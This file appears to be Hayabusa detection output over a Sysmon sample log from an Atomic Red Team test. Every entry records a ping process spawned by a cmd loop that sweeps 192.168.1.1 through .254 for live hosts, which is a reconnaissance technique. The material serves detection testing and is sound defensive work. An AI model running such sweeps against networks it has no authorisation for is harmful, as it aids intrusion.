+2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
